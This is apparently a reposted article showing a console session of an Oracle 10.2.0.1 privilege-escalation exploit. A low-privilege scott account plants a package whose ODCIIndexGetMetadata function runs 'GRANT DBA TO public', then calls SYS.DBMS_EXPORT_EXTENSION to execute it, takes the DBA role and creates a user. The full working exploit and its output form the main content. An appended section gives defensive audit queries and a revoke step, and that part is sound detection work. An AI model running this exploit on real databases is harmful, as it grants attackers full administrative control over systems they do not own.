Oracle Privilege Escalation

WBOY (original), 2016-06-07 15:38:33

The hack session follows:

Microsoft Windows [版本 5.2.3790]




C:\Documents and Settings\Administrator>sqlplus scott/tiger


SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 9月 23 23:07:17 2013


Copyright (c) 1982, 2005, Oracle.  All rights reserved.




连接到:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning, OLAP and Data Mining options


SQL> select * from session_privs;


PRIVILEGE
--------------------------------------------------------------------------------
CREATE SESSION
CREATE TABLE
CREATE CLUSTER
CREATE SEQUENCE
CREATE PROCEDURE
CREATE TRIGGER
CREATE TYPE
CREATE OPERATOR
CREATE INDEXTYPE


已选择9行。


SQL> CREATE OR REPLACE
  2  PACKAGE MYBADPACKAGE authid current_user
  3  IS
  4    FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
  5  VARCHAR2,p4  VARCHAR2,env SYS.odcienv)
  6     RETURN NUMBER;
  7  END;
  8  /


程序包已创建。


SQL> CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
  2  IS
  3    FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
  4  VARCHAR2,p4  VARCHAR2,env SYS.odcienv)
  5      RETURN NUMBER
  6    IS
  7    BEGIN
  8      EXECUTE IMMEDIATE 'GRANT DBA TO public';
  9      RETURN 1;
 10      EXCEPTION WHEN OTHERS THEN
 11      EXECUTE IMMEDIATE 'GRANT DBA TO public';
 12      return 1;
 13    END;
 14  END;
 15  /


程序包体已创建。


SQL> DECLARE
  2    INDEX_NAME VARCHAR2(200);
  3    INDEX_SCHEMA VARCHAR2(200);
  4    TYPE_NAME VARCHAR2(200);
  5    TYPE_SCHEMA VARCHAR2(200);
  6    VERSION VARCHAR2(200);
  7    NEWBLOCK PLS_INTEGER;
  8    GMFLAGS NUMBER;
  9    v_Return VARCHAR2(200);
 10  BEGIN
 11    INDEX_NAME := 'A1';  INDEX_SCHEMA := 'SCOTT';
 12    TYPE_NAME := 'MYBADPACKAGE';  TYPE_SCHEMA := 'SCOTT';
 13    VERSION := '10.2.0.1.0';  GMFLAGS := 1;
 14    v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
 15      INDEX_NAME => INDEX_NAME,    INDEX_SCHEMA => INDEX_SCHEMA,    TYPE_NAME
 16  => TYPE_NAME,
 17      TYPE_SCHEMA => TYPE_SCHEMA,    VERSION => VERSION,    NEWBLOCK =>
 18  NEWBLOCK,    GMFLAGS => GMFLAGS
 19            );
 20  END;
 21  /


PL/SQL 过程已成功完成。


SQL> create user qwe identified by qwe;
create user qwe identified by qwe
                              *
第 1 行出现错误:
ORA-01031: 权限不足




SQL> set role dba
  2  /


角色集


SQL> create user qwe identified by qwe;


用户已创建。


SQL> select * from session_privs;


PRIVILEGE
--------------------------------------------------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER


PRIVILEGE
--------------------------------------------------------------------------------
BECOME USER
.......

Testing shows that Oracle 10.2.0.4 and later versions do not have this security vulnerability.
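
A DBA-side audit for the state the session above leaves behind, as an added example that is not part of the original article. It uses the standard dictionary views DBA_ROLE_PRIVS, DBA_PROCEDURES, DBA_TAB_PRIVS and DBA_USERS; the list of excluded Oracle-owned schemas and the 30-day window are assumptions to adjust for the database being reviewed.

```sql
-- Added audit example; run from an account that can read the DBA_* views.

-- 1. The end result of the session: the DBA role granted to PUBLIC.
--    Any row here means every account can issue SET ROLE DBA.
SELECT grantee, granted_role, admin_option
  FROM dba_role_privs
 WHERE grantee = 'PUBLIC'
   AND granted_role = 'DBA';

-- 2. Packages in ordinary user schemas that expose ODCIIndexGetMetadata,
--    the callback name used by MYBADPACKAGE above. AUTHID shows whether the
--    package runs with invoker rights (CURRENT_USER), as in the session.
--    The schema exclusion list is an assumption: adjust to installed options.
SELECT owner, object_name, procedure_name, authid
  FROM dba_procedures
 WHERE UPPER(procedure_name) = 'ODCIINDEXGETMETADATA'
   AND owner NOT IN ('SYS', 'CTXSYS', 'MDSYS', 'ORDSYS', 'XDB')
 ORDER BY owner, object_name;

-- 3. Who holds EXECUTE on the SYS package called in the session.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_EXPORT_EXTENSION'
 ORDER BY grantee;

-- 4. Recently created accounts (the session created user QWE once the DBA
--    role was available). The 30-day window is an assumed review period.
SELECT username, created, account_status
  FROM dba_users
 WHERE created > SYSDATE - 30
 ORDER BY created DESC;

-- 5. Cleanup when query 1 returned a row. This statement fails with an
--    error if DBA is not currently granted to PUBLIC.
REVOKE DBA FROM PUBLIC;
```

Rows from query 2 and accounts from query 4 need manual review before anything is dropped, since legitimate domain-index implementations and new users can also appear there.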
